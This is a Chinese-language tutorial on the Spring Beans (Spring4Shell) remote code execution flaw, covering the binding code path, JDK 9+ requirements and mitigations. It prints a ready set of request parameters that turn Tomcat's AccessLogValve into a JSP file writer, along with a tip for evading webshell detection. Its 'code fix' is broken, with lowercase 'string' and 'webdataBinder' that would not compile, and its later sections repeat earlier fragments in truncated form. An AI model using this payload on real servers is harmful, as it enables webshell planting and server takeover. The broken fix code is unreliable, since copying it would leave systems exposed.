Spring Beans RCE漏洞分析与利用教学文档<\/h1>

漏洞概述<\/h2>
Spring MVC框架的参数绑定功能存在远程代码执行(RCE)漏洞，攻击者可通过构造恶意请求获取AccessLogValve对象并注入恶意字段值，触发pipeline机制写入任意文件。<\/p>

漏洞本质<\/h3>

参数绑定造成的变量覆盖漏洞<\/li>

漏洞点位于spring-beans包中<\/li> <\/ul>

影响范围<\/h3>

JDK版本：>=9<\/li>

Spring MVC全版本<\/li> <\/ul>

漏洞分析<\/h2>

属性注入机制<\/h3>

核心流程<\/strong>：<\/p>

Spring MVC参数绑定功能将请求参数绑定到控制器方法参数对象的成员变量<\/li>
漏洞利用点位于AbstractNestablePropertyAccessor.class#setPropertyValue<\/code><\/li> <\/ul> <\/li>
关键代码流程<\/strong>：<\/p> \/\/ 1. 递归获取propertyName属性所在的beanWrapper <\/span><\/span><\/span><\/span>AbstractNestablePropertyAccessor nestedPa =<\/span> getPropertyAccessorForPropertyPath(<\/span>propertyName);<\/span> <\/span><\/span> <\/span><\/span>\/\/ 2. 获取属性的token <\/span><\/span><\/span><\/span>PropertyTokenHolder tokens =<\/span> getPropertyNameTokens(<\/span>getFinalPath(<\/span>nestedPa,<\/span> propertyName));<\/span> <\/span><\/span> <\/span><\/span>\/\/ 3. 设置属性值 <\/span><\/span><\/span><\/span>nestedPa.<\/span>setPropertyValue<\/span>(<\/span>tokens,<\/span> new<\/span> PropertyValue(<\/span>propertyName,<\/span> value));<\/span> <\/span><\/span><\/code><\/pre><\/li> 递归获取属性<\/strong>：<\/p> protected<\/span> AbstractNestablePropertyAccessor getPropertyAccessorForPropertyPath<\/span>(<\/span>String propertyPath)<\/span> {<\/span> <\/span><\/span> int<\/span> pos =<\/span> PropertyAccessorUtils.<\/span>getFirstNestedPropertySeparatorIndex<\/span>(<\/span>propertyPath);<\/span> <\/span><\/span> <\/span><\/span> if<\/span> (<\/span>pos ><\/span> -<\/span>1<\/span>)<\/span> {<\/span> <\/span><\/span> String nestedProperty =<\/span> propertyPath.<\/span>substring<\/span>(<\/span>0<\/span>,<\/span> pos);<\/span> <\/span><\/span> String nestedPath =<\/span> propertyPath.<\/span>substring<\/span>(<\/span>pos +<\/span> 1<\/span>);<\/span> <\/span><\/span> AbstractNestablePropertyAccessor nestedPa =<\/span> getNestedPropertyAccessor(<\/span>nestedProperty);<\/span> <\/span><\/span> return<\/span> nestedPa.<\/span>getPropertyAccessorForPropertyPath<\/span>(<\/span>nestedPath);<\/span> <\/span><\/span> }<\/span> else<\/span> {<\/span> <\/span><\/span> return<\/span> this<\/span>;<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ol> 利用链分析<\/h3> 属性链示例<\/strong>：<\/p> class.module.classLoader.resources.context.parent.appBase <\/code><\/pre> <\/li> Java代码等价表示<\/strong>：<\/p> ((<\/span>org.<\/span>apache<\/span>.<\/span>catalina<\/span>.<\/span>loader<\/span>.<\/span>ParallelWebappClassLoader<\/span>)<\/span> <\/span><\/span> new<\/span> UserInfo().<\/span>getClass<\/span>().<\/span>getModule<\/span>().<\/span>getClassLoader<\/span>())<\/span> <\/span><\/span> .<\/span>getResources<\/span>().<\/span>getContext<\/span>().<\/span>getParent<\/span>()<\/span> <\/span><\/span><\/code><\/pre><\/li> 关键对象<\/strong>：<\/p> StandardContext<\/code>：Tomcat上下文对象<\/li> StandardHost<\/code>：通过.getParent()<\/code>获取<\/li> <\/ul> <\/li> <\/ol> AccessLogValve利用<\/h3> 可修改的关键属性<\/strong>：<\/p> pattern<\/code>：日志格式<\/li> suffix<\/code>：文件后缀<\/li> directory<\/code>：目录<\/li> prefix<\/code>：文件名前缀<\/li> fileDateFormat<\/code>：日期格式<\/li> <\/ul> <\/li> 典型攻击向量<\/strong>：<\/p> class.module.classLoader.resources.context.parent.appBase=.\/ class.module.classLoader.resources.context.parent.pipeline.first.pattern=%{Prefix123}i + 1231231 +%{Suffix123}i class.module.classLoader.resources.context.parent.pipeline.first.suffix=random1111.jsp class.module.classLoader.resources.context.parent.pipeline.first.directory=. class.module.classLoader.resources.context.parent.pipeline.first.prefix=webapps\/ROOT\/random1111 class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=time_fomrat_random111 <\/code><\/pre> <\/li> Pattern绕过技巧<\/strong>：<\/p> 使用%{xxx}i<\/code>引用请求头字段实现任意字符写入<\/li> 可进行字符拼接，绕过webshell检测<\/li> <\/ul> <\/li> <\/ol> JDK版本差异<\/h2> JDK 8 vs JDK 9+<\/h3> 关键区别<\/strong>：<\/p> JDK8：class<\/code> bean下没有module<\/code> bean<\/li> JDK9+：引入了模块系统，存在java.lang.Module<\/code><\/li> <\/ul> <\/li> 黑名单绕过机制<\/strong>：<\/p> Class.<\/span>class<\/span> !=<\/span> beanClass ||<\/span> !<\/span>"classLoader"<\/span>.<\/span>equals<\/span>(<\/span>pd.<\/span>getName<\/span>())<\/span> &&<\/span> !<\/span>"protectionDomain"<\/span>.<\/span>equals<\/span>(<\/span>pd.<\/span>getName<\/span>())<\/span> <\/span><\/span><\/code><\/pre> JDK8：只能用class.classLoader<\/code>，无法绕过黑名单<\/li> JDK9+：通过class.module.classLoader<\/code>绕过<\/li> <\/ul> <\/li> <\/ol> 利用条件<\/h2> 必要条件<\/strong>： JDK版本≥9<\/li> 使用Spring MVC框架<\/li> 请求接口对应控制器方法<\/li> 方法入参为非基础类（不能是String、int等）<\/li> 请求方法要与控制器方法对应<\/li> <\/ul> <\/li> <\/ol> 修复建议<\/h2> 临时修复方案<\/h3> 方案一：WAF防护<\/strong><\/p> 过滤包含以下字符串的请求： "class."<\/code><\/li> "Class."<\/code><\/li> ".class."<\/code><\/li> ".Class."<\/code><\/li> <\/ul> <\/li> <\/ul> <\/li> 方案二：代码修复<\/strong><\/p> import<\/span> org.springframework.core.annotation.Order;<\/span> <\/span><\/span>import<\/span> org.springframework.web.bind.WebDataBinder;<\/span> <\/span><\/span>import<\/span> org.springframework.web.bind.annotation.ControllerAdvice;<\/span> <\/span><\/span>import<\/span> org.springframework.web.bind.annotation.InitBinder;<\/span> <\/span><\/span> <\/span><\/span>@ControllerAdvice<\/span> <\/span><\/span>@Order<\/span>(<\/span>10000<\/span>)<\/span> <\/span><\/span>public<\/span> class<\/span> GlobalControllerAdvice<\/span> {<\/span> <\/span><\/span> @InitBinder<\/span> <\/span><\/span> public<\/span> void<\/span> setAllowedFields<\/span>(<\/span>webdataBinder dataBinder){<\/span> <\/span><\/span> String[]<\/span> abd =<\/span> new<\/span> string[]{<\/span>"class.*"<\/span>,<\/span> "Class.*"<\/span>,<\/span> "*.class.*"<\/span>,<\/span> "*.Class.*"<\/span>};<\/span> <\/span><\/span> dataBinder.<\/span>setDisallowedFields<\/span>(<\/span>abd);<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ol> 官方补丁<\/h3> 补丁地址：https:\/\/github.com\/spring-projects\/spring-framework\/commit\/afbff391d8299034cd98af968981504b6ca7b38c<\/li> 补丁内容：当beanClass是class.Class时，只允许添加name属性<\/li> 过滤ClassLoader和ProtectionDomain属性<\/li> <\/ul> <\/li> <\/ul> 其他注意事项<\/h2> 控制器方法要求<\/strong>：<\/p> 入参必须是非基础类<\/li> 入参为String等基础类型时无法触发漏洞<\/li> <\/ul> <\/li> Spring Boot差异<\/strong>：<\/p> Spring Boot使用AppClassLoader，没有getResources()方法<\/li> Spring MVC使用ParallelWebappClassLoader<\/li> <\/ul> <\/li> <\/ol> 参考链接<\/h2> CVE-2010-1622分析<\/a><\/li> Tomcat Access Log配置<\/a><\/li> Tomcat Valve文档<\/a><\/li> Spring官方公告<\/a><\/li> <\/ul>

Spring Beans RCE漏洞分析与利用教学文档<\/h1>

漏洞概述<\/h2> Spring MVC框架的参数绑定功能存在远程代码执行(RCE)漏洞，攻击者可通过构造恶意请求获取AccessLogValve对象并注入恶意字段值，触发pipeline机制写入任意文件。<\/p>

漏洞分析<\/h2>

JDK版本差异<\/h2>

修复建议<\/h2>

参考链接<\/h2> CVE-2010-1622分析<\/a><\/li> Tomcat Access Log配置<\/a><\/li> Tomcat Valve文档<\/a><\/li> Spring官方公告<\/a><\/li> <\/ul>

漏洞概述<\/h2>
Spring MVC框架的参数绑定功能存在远程代码执行(RCE)漏洞，攻击者可通过构造恶意请求获取AccessLogValve对象并注入恶意字段值，触发pipeline机制写入任意文件。<\/p>

参考链接<\/h2>

CVE-2010-1622分析<\/a><\/li>
Tomcat Access Log配置<\/a><\/li>
Tomcat Valve文档<\/a><\/li>
Spring官方公告<\/a><\/li> <\/ul>